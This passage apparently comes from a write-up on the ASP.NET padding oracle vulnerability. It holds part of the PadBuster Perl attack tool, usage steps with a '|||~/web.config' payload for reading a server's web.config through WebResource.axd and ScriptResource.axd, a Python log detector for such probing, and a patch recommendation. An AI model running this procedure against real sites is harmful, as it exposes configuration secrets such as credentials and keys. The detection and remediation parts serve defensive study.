						&myPrint("[+] without an error string to perform an automated response analysis.\n",0);
					} else {
						&myPrint("[+] You may want to consider defining a custom padding error string",0);
						&myPrint("[+] instead of the automated response analysis.\n",0);
					}
					$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
					if ($continue eq "y") {
						&myPrint("INFO: Switching to interactive mode",0);
						$interactive = 1;
						$repeat = 1;
						last OUTERLOOP;
					}
				}
			} 
		}
		($repeat == 1) ? ($complete = 0) : ($complete = 1);
	}
	return $returnValue;
}
 
sub makeRequest {
 
 my ($method, $url, $data, $cookie) = @_; 
 my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);   
 my $numRetries = 0;
 $data ='' unless $data;
 $cookie='' unless $cookie;
 
 $requestTracker++;
 do {
  #Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed)
  $ENV{HTTPS_PROXY} = "";
 
  $lwp = LWP::UserAgent->new(env_proxy => 1,
                            keep_alive => 1,
                            timeout => 30,
			    requests_redirectable => [],
                            );
 
  $req = new HTTP::Request $method => $url;
 
  &myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose;
 
  # Add request content for POST and PUTS 
  if ($data) {
   $req->content_type('application/x-www-form-urlencoded');
   $req->content($data);
  }
 
  if ($proxy) {
  	my $proxyUrl = "http://";
  	if ($proxyAuth) {
 		my ($proxyUser, $proxyPass) = split(":",$proxyAuth);
 		$ENV{HTTPS_PROXY_USERNAME}	= $proxyUser;
		$ENV{HTTPS_PROXY_PASSWORD}	= $proxyPass;
		$proxyUrl .= $proxyAuth."@";
 	}
 	$proxyUrl .= $proxy;
 	$lwp->proxy(['http'], "http://".$proxy);
	$ENV{HTTPS_PROXY} = "http://".$proxy;
  } 	
 
 
  if ($auth) {
   my ($httpuser, $httppass) = split(/:/,$auth);
   $req->authorization_basic($httpuser, $httppass);
  }
 
  # If cookies are defined, add a COOKIE header
  if (! $cookie eq "") {
   $req->header(Cookie => $cookie);
  }
 
  if ($headers) {
   my @customHeaders = split(/;/i,$headers);
   for (my $i = 0; $i <= $#customHeaders; $i++) {
    my ($headerName, $headerVal) = split(/\::/i,$customHeaders[$i]);
    $req->header($headerName, $headerVal);
   }
  }
 
  my $startTime = &gettimeofday();
  my $response = $lwp->request($req);
  my $endTime = &gettimeofday();  
  $timeTracker = $timeTracker + ($endTime - $startTime);
 
  if ($printStats == 1 && $requestTracker % 250 == 0) {
  	print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/100).")\n";
  	$timeTracker = 0;
  }
 
 
  # Extract the required attributes from the response
  $status = substr($response->status_line, 0, 3);
  $content = $response->content;
 
  &myPrint("Response Content:\n$content",0) if $superVerbose;
  $location = $response->header("Location");
  if (!$location)   {
   $location = "N/A";
  }
  #$contentLength = $response->header("Content-Length");
  $contentLength = length($content);
 
 
  my $contentEncoding = $response->header("Content-Encoding");
  if ($contentEncoding) {
   if ($contentEncoding =~ /GZIP/i ) {
    	$content = Compress::Zlib::memGunzip($content);
  	$contentLength = length($content);
   }
  }
 
  my $statusMsg = $response->status_line;
  #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1); 
 
  if ($statusMsg =~ /Can't connect/) {
   print "ERROR: $statusMsg\n   Retrying in 10 seconds...\n\n";
   $noConnect = 1;
   $numRetries++;
   sleep 10;
  } else {
   $noConnect = 0;
   $totalRequests++;
  }  
 } until (($noConnect == 0) || ($numRetries >= 15));
 if ($numRetries >= 15) {
  &myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0);
  exit;
 }
 return ($status, $content, $location, $contentLength);
}
 
sub myPrint {
 my ($printData, $printLevel) = @_;
 $printData .= "\n";
 if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) {
  print $printData;
  &writeFile("ActivityLog.txt",$printData);
 }
}
 
sub myEncode {
 my ($toEncode, $format) = @_;
 return &encodeDecode($toEncode, 0, $format);
}
 
sub myDecode {
 my ($toDecode, $format) = @_;
 return &encodeDecode($toDecode, 1, $format);
}
 
sub encodeDecode {
 my ($toEncodeDecode, $oper, $format) = @_;
 # Oper: 0=Encode, 1=Decode
 # Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken
 my $returnVal = "";
 if ($format == 1 || $format == 2) {
   # HEX
   if ($oper == 1) {
   	#Decode
   	#Always convert to lower when decoding)
   	$toEncodeDecode = lc($toEncodeDecode);
	$returnVal = pack("H*",$toEncodeDecode);
   } else {
   	#Encode
	$returnVal = unpack("H*",$toEncodeDecode);
	if ($format == 2) {
	   	#Uppercase
		$returnVal = uc($returnVal)
   	}
   }
 } elsif ($format == 3) {
   # NetUrlToken
   if ($oper == 1) {
	$returnVal = &web64Decode($toEncodeDecode,1);
   } else {
	$returnVal = &web64Encode($toEncodeDecode,1);
   } 
 } elsif ($format == 4) {
    # Web64
    if ($oper == 1) {
 	$returnVal = &web64Decode($toEncodeDecode,0);
    } else {
 	$returnVal = &web64Encode($toEncodeDecode,0);
    } 
 } else {
    # B64
    if ($oper == 1) {
 	$returnVal = &decode_base64($toEncodeDecode);
    } else {
 	$returnVal = &encode_base64($toEncodeDecode);
 	$returnVal =~ s/(\r|\n)//g;	
    }
 }
 
 return $returnVal;
}
 
 
sub web64Encode {
 my ($input, $net) = @_;
 # net: 0=No Padding Number, 1=Padding (NetUrlToken)
 $input = &encode_base64($input);
 $input =~ s/(\r|\n)//g;
 $input =~ s/\+/\-/g;
 $input =~ s/\//\_/g;
 my $count = $input =~ s/\=//g;
 $count = 0 if ($count eq "");
 $input.=$count if ($net == 1);
 return $input;
}
 
sub web64Decode {
 my ($input, $net) = @_;
 # net: 0=No Padding Number, 1=Padding (NetUrlToken)
 $input =~ s/\-/\+/g;
 $input =~ s/\_/\//g;
 if ($net == 1) {
  my $count = chop($input);
  $input = $input.("=" x int($count));
 }
 return &decode_base64($input);
}
 
 
sub promptUser {
 my($prompt, $default, $yn) = @_;
 my $defaultValue = $default ? "[$default]" : "";
 print "$prompt $defaultValue: ";
 chomp(my $input = <STDIN>);
 
 $input = $input ? $input : $default;
 if ($yn) {
  if ($input =~ /^y|n|a$/) {
   return $input;
  } else {
   &promptUser($prompt, $default, $yn);
  }
 } else {
  if ($input =~ /^-?\d/ && $input > 0 && $input < 256) {
   return $input;
  } else {
   &promptUser($prompt, $default);
  }
 }
}
 
sub writeFile {
 my ($fileName, $fileContent) = @_;
 if ($logFiles) {
  if ($dirExists != 1) {
   system($dirCmd." ".$dirName);
   $dirExists = 1;
  }
  $fileName = $dirName.$dirSlash.$fileName;
  open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n";
  print $OUTFILE $fileContent;
  close($OUTFILE);
 }
}
 
sub getTime { 
 my ($format) = @_;
 my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) = localtime(time);
 my @months = ("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC");
 my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT");
 $month=sprintf("%02d",$month);
 $day=sprintf("%02d",$day);
 $hour=sprintf("%02d",$hour);
 $minute=sprintf("%02d",$minute);
 $second=sprintf("%02d", $second);
 $year =~ s/^.//;
 if ($format eq "F") {
  return $day.$months[$month].$year."-".( ($hour * 3600) + ($minute * 60) + ($second) );
 } elsif ($format eq "S") {
  return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second;
 } else {
  return $hour.":".$minute.":".$second;
 }
}

Usage

Padbuster.pl http://www.xxx.com/WebResource.axd?d=XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX 16 -encoding 3 -plaintext "|||~/web.config"

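XXXXXXXXXXXXXXXX is the value of parameter d in http://www.xxx.com/WebResource.axd?d=XXXXXXXXXXXXXXXX. 16 is the number of bytes per data block, which is either 8 or 16. The encoding parameter has 4 kinds, namely 0=Base64, 1=Lower HEX, 2=Upper HEX 3=.NET UrlToken, 4=WebSafe Base64. plaintext is the file whose content you want to read; web.config is used as the example here. After that, follow the program's prompts. If the site has the padding oracle vulnerability, the tool finally returns the encrypted address of the URL for web.config.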

Webconfig Bruter.pl http://www.xxx.com/ScriptResource.axd XXXXXXXXXXXXXXXXXX 16

XXXXXXXXXXXXXXXXXX is the encrypted address obtained from Padbuster.pl.

Visit

http://www.xxx91ri.org/ScriptResource.axd?d=XXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXX is the encrypted address obtained from Webconfig Bruter.pl. The server returns the content of the target file (here, the web.config file).
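A detection-side view of the procedure above, as an added example that is not part of the original page or of either tool: the tools send many requests to WebResource.axd or ScriptResource.axd, each with a different d value, and most of them fail, which stands out in web server logs. The seven-field log layout, the thresholds, the status codes, the client addresses and the d values are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Handlers named on this page; matched case-insensitively.
AXD_HANDLERS = ("/webresource.axd", "/scriptresource.axd")


def parse_line(line):
    """Parse 'date time c-ip cs-method cs-uri-stem cs-uri-query sc-status'."""
    parts = line.split()
    if line.startswith("#") or len(parts) != 7:
        return None
    date, time, ip, _method, stem, query, status = parts
    try:
        ts = datetime.strptime(date + " " + time, "%Y-%m-%d %H:%M:%S")
        code = int(status)
    except ValueError:
        return None
    d_value = parse_qs(query).get("d", [""])[0]
    return {"ts": ts, "ip": ip, "stem": stem.lower(), "d": d_value, "status": code}


def find_probing(lines, window=timedelta(minutes=5), min_distinct=50,
                 min_error_ratio=0.9):
    """Flag clients that send many distinct d values that mostly fail.

    The thresholds are assumptions to tune against real traffic.
    """
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["stem"].endswith(AXD_HANDLERS) and rec["d"]:
            per_ip[rec["ip"]].append(rec)

    alerts = []
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            # Slide the window so it never spans more than `window`.
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            win = recs[start:end + 1]
            distinct = len({r["d"] for r in win})
            errors = sum(1 for r in win if r["status"] >= 400)
            if distinct >= min_distinct and errors / len(win) >= min_error_ratio:
                alerts.append({"ip": ip, "distinct_d": distinct,
                               "requests": len(win),
                               "first_seen": win[0]["ts"]})
                break  # one alert per client is enough
    return alerts


def build_sample_log():
    """Constructed log lines: a visitor, a crawler and a probing client."""
    base = datetime(2010, 10, 1, 12, 0, 0)

    def row(offset_s, ip, stem, d_value, status):
        ts = (base + timedelta(seconds=offset_s)).strftime("%Y-%m-%d %H:%M:%S")
        return f"{ts} {ip} GET {stem} d={d_value} {status}"

    lines = ["#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status"]
    # Ordinary visitor: a few resource URLs, all served successfully.
    for i in range(6):
        lines.append(row(i, "192.0.2.10", "/WebResource.axd", f"res{i % 3}", 200))
    # Crawler: many distinct d values, but every request succeeds.
    for i in range(60):
        lines.append(row(i, "203.0.113.7", "/ScriptResource.axd", f"ok{i:03d}", 200))
    # Probing client: hundreds of distinct d values, nearly all failing.
    for i in range(300):
        status = 404 if i % 64 == 0 else 500
        lines.append(row(i // 5, "198.51.100.23", "/ScriptResource.axd",
                         f"probe{i:04d}", status))
    return lines


if __name__ == "__main__":
    for alert in find_probing(build_sample_log()):
        print(alert)
```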

4. Real-World Cases

5. Remediation


Install the official Microsoft patch.

6. Related Resources